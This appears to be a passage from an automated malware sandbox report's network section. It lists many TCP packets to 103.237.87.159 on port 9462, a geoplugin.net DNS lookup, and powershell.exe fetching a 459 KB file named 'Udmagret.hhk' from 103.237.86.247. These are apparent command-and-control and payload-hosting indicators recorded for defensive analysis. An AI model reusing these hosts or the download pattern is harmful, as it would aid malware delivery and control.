                  Jul 2, 2024 10:27:58.725395918 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725409031 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725415945 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.725440979 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.725496054 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725507021 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725517988 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725528955 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725533009 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.725541115 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725553036 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725558043 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.725565910 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725577116 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725584984 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.725589991 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725604057 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.725627899 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725645065 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.725699902 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725712061 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725723028 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725734949 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725747108 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725750923 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.725780964 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.725811005 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725838900 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725851059 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.725887060 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.726753950 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.726771116 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.726783037 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.726804018 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.726809978 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.726815939 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.726823092 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.726830006 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.726843119 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.726856947 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.726856947 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.726883888 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.726988077 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.727005959 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.727018118 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.727025032 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.727030039 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.727041006 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.727054119 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.727054119 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.727082968 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.729105949 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.729121923 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.729134083 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.729146957 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.729176998 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.729203939 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.729214907 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.729226112 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.729238987 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.729249001 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.729285955 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.729302883 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.729315042 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.729325056 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.729337931 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.729350090 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.729351044 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.729367018 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.729374886 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.729409933 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.729542971 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.731376886 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.731391907 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.731403112 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.731425047 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.731437922 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.731446028 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.731451988 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.731467009 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.731479883 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.731513977 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.731554031 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.731565952 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.731576920 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.731589079 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.731601954 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.731612921 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.731627941 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.731627941 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.731652975 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.733618975 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.733679056 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.733719110 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.740977049 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.747982979 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:58.978930950 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.978972912 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.978986979 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979000092 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979012012 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979026079 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979033947 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979047060 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979062080 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979063034 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979072094 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979099035 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979114056 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979126930 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979140043 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979166985 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979233980 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979247093 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979259014 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979270935 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979285002 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979285002 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979299068 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979312897 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979326963 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979336023 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979347944 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979386091 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979391098 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979403019 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979414940 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979427099 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979439020 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979441881 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979463100 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979480982 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979562044 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979573011 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979587078 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979625940 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979713917 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979726076 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979737997 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979748964 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979753971 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979762077 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979772091 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979775906 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979794979 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979800940 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979809046 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979823112 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979840994 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979861021 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.979887009 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979957104 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979975939 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979989052 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.979999065 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980001926 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980015993 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980025053 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980030060 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980066061 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980118036 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980132103 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980144024 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980155945 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980169058 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980170012 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980181932 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980195045 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980196953 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980207920 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980215073 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980242968 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980334044 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980345964 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980359077 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980386019 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980408907 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980417967 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980431080 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980452061 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980463982 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980469942 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980477095 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980494022 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980514050 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980529070 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980539083 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980542898 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980556011 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980568886 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980582952 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980587006 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980597019 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980607986 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980612040 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980639935 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980664968 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980680943 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980693102 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980720043 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980755091 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980767012 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980779886 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980791092 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.980818033 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.980931997 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981107950 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981146097 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981148005 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981230974 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981244087 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981255054 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981271029 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981283903 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981309891 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981322050 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981333971 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981345892 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981349945 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981370926 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981393099 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981405973 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981420040 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981432915 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981435061 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981457949 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981555939 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981568098 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981579065 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981591940 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981604099 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.981607914 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981635094 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981647015 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.981895924 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983144045 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983216047 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983269930 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983282089 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983303070 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983309031 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983316898 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983341932 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983349085 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983356953 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983364105 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983397007 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983438015 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983448982 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983460903 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983474970 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983498096 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983522892 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983639002 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983652115 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983663082 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983679056 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983692884 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983704090 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983705044 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983719110 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983728886 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983731031 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983741999 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983746052 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983769894 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.983906984 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:58.983951092 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:58.986192942 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:59.071449041 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071477890 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071491957 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071502924 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071516037 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071530104 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:59.071533918 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071530104 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:59.071547985 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071567059 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071574926 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:59.071587086 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071598053 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071610928 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071610928 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:59.071625948 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071636915 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:59.071636915 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:27:59.071659088 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:27:59.123405933 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:28:06.930775881 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:28:06.935759068 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.935775042 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.935794115 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.935806036 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.935816050 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.935827971 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:28:06.935847998 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:28:06.936037064 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.936048031 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.936064959 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.936074972 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.936083078 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.940849066 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.940862894 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.940872908 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.940881968 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.940891027 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.940959930 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:06.940969944 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:07.152750969 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:28:07.161415100 CEST946249740103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:07.161474943 CEST497409462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:28:09.253257036 CEST946249739103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:09.254616976 CEST497399462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:28:09.259546995 CEST946249739103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:39.265721083 CEST946249739103.237.87.159192.168.2.4
                  Jul 2, 2024 10:28:39.266973972 CEST497399462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:28:39.272182941 CEST946249739103.237.87.159192.168.2.4
                  Jul 2, 2024 10:29:09.285011053 CEST946249739103.237.87.159192.168.2.4
                  Jul 2, 2024 10:29:09.451601028 CEST497399462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:29:10.346620083 CEST497399462192.168.2.4103.237.87.159
                  Jul 2, 2024 10:29:10.351613998 CEST946249739103.237.87.159192.168.2.4

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 2, 2024 10:27:54.803399086 CEST5030553192.168.2.41.1.1.1
                  Jul 2, 2024 10:27:54.816128016 CEST53503051.1.1.1192.168.2.4

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jul 2, 2024 10:27:54.803399086 CEST192.168.2.41.1.1.10x4dbbStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jul 2, 2024 10:27:54.816128016 CEST1.1.1.1192.168.2.40x4dbbNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • 103.237.86.247
                  • geoplugin.net

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.449731103.237.86.247805352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 10:27:03.940207958 CEST170OUTGET /Udmagret.hhk HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Host: 103.237.86.247
                  Connection: Keep-Alive
                  Jul 2, 2024 10:27:04.914321899 CEST1236INHTTP/1.1 200 OK
                  Content-Type: application/octet-stream
                  Last-Modified: Tue, 02 Jul 2024 08:00:14 GMT
                  Accept-Ranges: bytes
                  ETag: "289dd6de55ccda1:0"
                  Server: Microsoft-IIS/8.5
                  Date: Tue, 02 Jul 2024 08:27:00 GMT
                  Content-Length: 459120
